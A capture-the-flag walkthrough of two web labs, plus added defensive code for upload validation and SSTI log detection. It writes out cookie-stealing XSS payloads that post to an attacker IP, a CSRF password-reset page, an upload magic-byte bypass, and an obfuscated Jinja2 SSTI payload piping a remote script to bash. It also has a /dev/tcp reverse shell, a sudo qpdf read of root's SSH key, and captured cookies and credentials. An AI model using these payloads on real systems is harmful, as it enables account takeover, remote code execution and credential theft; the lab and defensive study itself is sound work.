# XSS to Admin

# LAB 1: XSS on the Register Page (Steal Cookie) / CSRF in the Chat Room (Reset Admin Password) (no filter)

https://tryhackme.com/r/room/whatsyourname

## Recon

```
TARGET_IP=10.10.170.126
nmap $TARGET_IP
nmap $TARGET_IP -sV -sC
```

![image](https://hackmd.io/_uploads/HyFIsP4GR.png)

```
TARGET_DOMAIN='worldwap.thm'
echo "$TARGET_IP $TARGET_DOMAIN" >> /etc/hosts
```

## Directory Enumeration

Initial scan:

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$TARGET_IP -t 10
```

![image](https://hackmd.io/_uploads/SyNw2D4GC.png)

Website -> PHP with a DB login!

![image](https://hackmd.io/_uploads/HkQhnDVzR.png)

Enumerate PHP files:

```
gobuster dir -w /usr/share/wordlists/dirb/common.txt -x php -u http://$TARGET_IP/ -t 10
```

```
http://10.10.170.126/login.php
```

![image](https://hackmd.io/_uploads/SJFUaPNMA.png)

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -u http://$TARGET_IP/ -t 30
```

![image](https://hackmd.io/_uploads/SJ-I0vNG0.png)

## Register Page

http://worldwap.thm/public/html/register.php

![image](https://hackmd.io/_uploads/SyyCCPVfA.png)

The session cookie on the register page is not set with HttpOnly, so page script can read it. Attempt to inject XSS that sends the cookie to a listener:

```
python3 -m http.server 80
```

```
<svg onload="fetch('http://10.6.70.160:80?id=1', {method: 'POST',mode: 'no-cors',body: document.cookie});"></svg>
```

![image](https://hackmd.io/_uploads/S1pig_4GC.png)

![image](https://hackmd.io/_uploads/SJ-mzdNM0.png)

```
PHPSESSID=2a7uibfrhdir3emrgra2j7b0bi
```

![image](https://hackmd.io/_uploads/SkCVEOVM0.png)

## Access `login.worldwap.thm`

```
TARGET_DOMAIN='login.worldwap.thm'
echo "$TARGET_IP $TARGET_DOMAIN" >> /etc/hosts
```

![image](https://hackmd.io/_uploads/HJqZB_NzC.png)

![image](https://hackmd.io/_uploads/rk8rvuEf0.png)

![image](https://hackmd.io/_uploads/HJM8vu4MR.png)

```
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u worldwap.thm -t 30
```

```
gobuster dir -w /usr/share/wordlists/dirb/common.txt -x php -u worldwap.thm/public/html/ -t 30 --cookies 'PHPSESSID=2pl85dtr7icq9mi6qv1acnokpd'
```

Add the cookie!

![image](https://hackmd.io/_uploads/HJffsu4G0.png)

## Upload

```
<?php phpinfo() ?>
```

### Upload Bypass: Magic Number

JPG magic bytes:

```
FF D8 FF E0
```

Placeholder bytes at the start of the PHP file, to be overwritten with the magic bytes in hexedit:

```
XXXX <?php phpinfo() ?>
```

```
hexedit test.php
```

- F2: save
- Ctrl+X: exit
- F1: command help

![image](https://hackmd.io/_uploads/Hkyt1YNz0.png)

![image](https://hackmd.io/_uploads/rJhkeKVzA.png)

![image](https://hackmd.io/_uploads/rkF-ltVz0.png)

Upload bypassed.

## Chat Room

```
http://login.worldwap.thm/chat.php
```

Test whether XSS works:

```
<svg onload="&#97;&#108;&#101;&#114;&#116;(1)"></svg>
```

![image](https://hackmd.io/_uploads/rJFuzYVGC.png)

### Reset Password (CSRF)

```
<html>
  <body>
    <form action="http://login.worldwap.thm/change_password.php" method="POST">
      <input type="hidden" name="new_password" value="meowmeow" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```

![image](https://hackmd.io/_uploads/ByxaXF4M0.png)

Base64-encode the URL (bypass):

```
<html>
  <body>
    <form id="myForm" method="POST">
      <input type="hidden" name="new_password" value="meowmeow" />
    </form>
    <script>
      var form = document.getElementById("myForm");
      var actionUrl = atob("aHR0cDovL2xvZ2luLndvcmxkd2FwLnRobS9jaGFuZ2VfcGFzc3dvcmQucGhw");
      form.setAttribute("action", actionUrl);
      form.submit();
    </script>
  </body>
</html>
```

Works!!!!

![image](https://hackmd.io/_uploads/HkjLvYVG0.png)

```
AdM!nP@wnEd
```

Admin session:

```
PHPSESSID=vr904o45mohb1lhj2o3kt8b7lu
```

Solved!!
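The magic-number bypass above works because the upload check compares only the first bytes of the file. As an added example (not from the room or this write-up), here is a Python validator that walks the JPEG segment structure and also refuses files carrying a PHP open tag; the sample inputs, including the rebuilt bypass file, are constructed.

```python
# Upload check beyond a magic-number comparison (added example). The Lab 1 bypass
# prepends FF D8 FF E0 to a PHP file; walking the JPEG segment structure rejects it.
SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
STANDALONE = {0x01, *range(0xD0, 0xD8)}  # TEM and RST0-7 carry no length field
PHP_TAGS = (b"<?php", b"<?=")

def jpeg_structure_error(data):
    """Return None for a structurally plausible JPEG, otherwise the reason."""
    if len(data) < 4 or data[0] != 0xFF or data[1] != SOI:
        return "missing SOI marker"
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return f"expected marker at offset {pos}"
        marker = data[pos + 1]
        if marker == 0xFF:          # fill byte before a marker, skip it
            pos += 1
            continue
        pos += 2
        if marker == SOS:           # entropy-coded data follows; file must end in EOI
            return None if data.endswith(bytes([0xFF, EOI])) else "missing EOI marker"
        if marker in STANDALONE:
            continue
        # 2-byte big-endian length that includes itself; in the bypass file it is " <" = 8252
        length = int.from_bytes(data[pos:pos + 2], "big")
        if length < 2 or pos + length > len(data):
            return f"segment 0x{marker:02X} length {length} does not fit in the file"
        pos += length
    return "no SOS marker found"

def inspect_upload(data):
    """Accept only structurally valid JPEGs that carry no PHP open tag."""
    err = jpeg_structure_error(data)
    if err:
        return False, err
    if any(tag in data.lower() for tag in PHP_TAGS):
        return False, "PHP open tag embedded in image data"
    return True, "ok"

def build_sample_jpeg(comment=None):
    """Constructed minimal JPEG byte layout (not a real picture) for testing."""
    def seg(marker, payload):
        return bytes([0xFF, marker]) + (len(payload) + 2).to_bytes(2, "big") + payload
    out = bytes([0xFF, SOI]) + seg(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    if comment is not None:
        out += seg(0xFE, comment)   # COM segment, where a polyglot would hide PHP
    return out + seg(SOS, b"\x01\x01\x00\x00\x3f\x00") + b"\x12\x34" + bytes([0xFF, EOI])

# The write-up's upload: the XXXX placeholder overwritten with the JPG magic bytes
BYPASS_UPLOAD = b"\xff\xd8\xff\xe0" + b" <?php phpinfo() ?>"
```

Even a file that passes both checks is only safe to keep if uploads are stored under a server-chosen name and served without a PHP handler.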
# Lab 2: XSS via Send Message (Steal Cookie) / User input insecurely embedded in a template: SSTI/XSS (Python) -> SSTI RCE (filter bypass) / sudo qpdf reads /root/.ssh/id_rsa

```
TARGET_IP=10.10.11.12
TARGET_DOMAIN='capiclean.htb'
```

```
nmap $TARGET_IP -sV -sC -T4
```

![image](https://hackmd.io/_uploads/BkDwblFf0.png)

```
echo "$TARGET_IP $TARGET_DOMAIN" >> /etc/hosts
```

```
gobuster dir -w /usr/share/wordlists/dirb/common.txt -x .py -u http://$TARGET_IP -t 10 -k
```

## XSS: Steal Cookie via Send Message

```
<img src=x onerror=fetch(`//10.10.14.79:443/?A=${encodeURIComponent(document.cookie)}`);>
```

![image](https://hackmd.io/_uploads/BJQHdgYM0.png)

Captured cookie (URL-encoded, then decoded):

```
session%3DeyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.Zjr5MQ.Deh8SN1QxslwHu6Owubhq7fC_lc
session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.Zjr5MQ.Deh8SN1QxslwHu6Owubhq7fC_lc
```

![image](https://hackmd.io/_uploads/rJQDYetGA.png)

## Access Dashboard via Cookie

![image](https://hackmd.io/_uploads/rksW5gKMR.png)

![image](https://hackmd.io/_uploads/Hk5_cxtzC.png)

![image](https://hackmd.io/_uploads/SynWogKfC.png)

![image](https://hackmd.io/_uploads/H1x4ogKMR.png)

![image](https://hackmd.io/_uploads/rJqe3xtGC.png)

XSS filter-bypass payloads:

```
"><iMg src=x onerror=\70rompt`meow`>
"><iMg src=x onerror=&#00000000000000000000000000000000000000000097;&#108;&#101;&#114;&#116;`meow`>
```

![image](https://hackmd.io/_uploads/HJwuneFf0.png)

## Reflected XSS -> SSTI Injection

![image](https://hackmd.io/_uploads/rki6RetfA.png)

![image](https://hackmd.io/_uploads/SJ5gkZFz0.png)

![image](https://hackmd.io/_uploads/B1TMkZtMC.png)

Template -> Jinja2 (Python)

```
{% import os %}{{os.system('whoami')}}
```

Fails (Jinja2's `{% import %}` loads another template's macros, not a Python module, so `os` is never defined).

![image](https://hackmd.io/_uploads/BywCy-YMC.png)

Reverse shell one-liner:

```
bash -i >& /dev/tcp/10.10.14.79/443 0>&1
```

![image](https://hackmd.io/_uploads/r1kMfbtfC.png)

Filter bypass: the `__` in attribute names is written with `\x5f` escapes so the literal string never appears in the request:

```
{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl 10.10.14.79:80/reshell | bash")|attr("read")()}}
```

![image](https://hackmd.io/_uploads/BkoBf-tM0.png)

Got a reverse shell!!

![image](https://hackmd.io/_uploads/ByO_4bYMA.png)

Database credentials:

```
host': '127.0.0.1', 'user': 'iclean', 'password': 'pxCsmnGLckUb', 'database': 'capiclean'
```

SSH login with these credentials fails.

![image](https://hackmd.io/_uploads/HJNIHWtMA.png)

![image](https://hackmd.io/_uploads/HyPKSWKGC.png)

![image](https://hackmd.io/_uploads/SkQRB-Kz0.png)

```
1 | admin    | 2ae316f10d49222f369139ce899e414e57ed9e339bb75457446f2ba8628a6e51 | 21232f297a57a5a743894a0e4a801fc3 |
2 | consuela | 0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa | ee11cbb19052e40b07aac0ca060c23ee |
```

![image](https://hackmd.io/_uploads/SJql8WKfA.png)

![image](https://hackmd.io/_uploads/HkaQL-YG0.png)

```
simple and clean
```

![image](https://hackmd.io/_uploads/BJ8u8bKfC.png)

## Exploit: sudo qpdf

qpdf can be run with sudo, so root's private key can be attached to a new PDF written to a readable location:

```
sudo qpdf --empty /tmp/rsa.txt --qdf --add-attachment /root/.ssh/id_rsa --
```

![image](https://hackmd.io/_uploads/B1XU9btMC.png)

The output contains root's OpenSSH private key (key material omitted here). Save it as `rsa` and log in:

```
chmod 600 rsa
ssh root@10.10.11.12 -i rsa
```

![image](https://hackmd.io/_uploads/HJ9mjZKzR.png)

Solved
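The hex-escape trick in the working SSTI payload (`\x5f\x5f` standing in for `__`) defeats a filter that only matches the literal string. As an added example that is not part of the write-up, the following Python detection decodes URL encoding, HTML entities and `\xNN`/`\uNNNN` escapes before matching, and runs over constructed access-log lines; the `/generate?link=` endpoint and the timestamps are placeholders.

```python
# SSTI probe detection for access logs (added example, not from the write-up).
# The Lab 2 payload writes __globals__ as \x5f\x5fglobals\x5f\x5f to get past a
# filter that looks for "__"; matching only after decoding defeats that trick.
import html
import re
from urllib.parse import quote, unquote

INDICATORS = {
    "template_expression": re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S),
    "attr_filter_chain": re.compile(r"\|\s*attr\s*\("),
    "dunder_access": re.compile(r"__(globals|builtins|import|class|mro|subclasses|getitem)__"),
    "os_exec": re.compile(r"\bpopen\b|\bsystem\s*\(|\bsubprocess\b"),
}

def normalize(text):
    """Peel off URL encoding (twice, for double encoding), HTML entities, then \\xNN / \\uNNNN escapes."""
    for _ in range(2):
        text = unquote(text)
    text = html.unescape(text)
    text = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)

def ssti_indicators(line):
    """Indicator names present in the line after normalization."""
    norm = normalize(line)
    return [name for name, rx in INDICATORS.items() if rx.search(norm)]

def scan_log(lines):
    """Flag any dunder access, or a template expression plus one more indicator; returns (line no, hits)."""
    flagged = []
    for no, line in enumerate(lines, 1):
        hits = ssti_indicators(line)
        if "dunder_access" in hits or ("template_expression" in hits and len(hits) > 1):
            flagged.append((no, hits))
    return flagged

# Constructed log lines: the write-up's obfuscated payload and its failed first
# attempt, URL-encoded as a browser sends them, plus a benign request.
# The /generate?link= endpoint and the timestamps are placeholders.
PAGE_PAYLOAD = ('{{request|attr("application")|attr("\\x5f\\x5fglobals\\x5f\\x5f")'
                '|attr("\\x5f\\x5fgetitem\\x5f\\x5f")("\\x5f\\x5fbuiltins\\x5f\\x5f")}}')
SAMPLE_LOG = [
    '10.10.14.79 - - [07/May/2024:10:01:02 +0000] "GET /generate?link='
    + quote(PAGE_PAYLOAD) + ' HTTP/1.1" 200 812',
    '10.10.14.79 - - [07/May/2024:10:00:11 +0000] "GET /generate?link='
    + quote("{% import os %}{{os.system('whoami')}}") + ' HTTP/1.1" 500 207',
    '10.10.14.20 - - [07/May/2024:09:58:40 +0000] "GET /generate?link=https://capiclean.htb/invoice/42 HTTP/1.1" 200 1040',
]
```

Running `scan_log(SAMPLE_LOG)` flags the first two lines and leaves the benign request alone; the real fix on the server side is to pass user input to the template as a context variable rather than concatenating it into the template source.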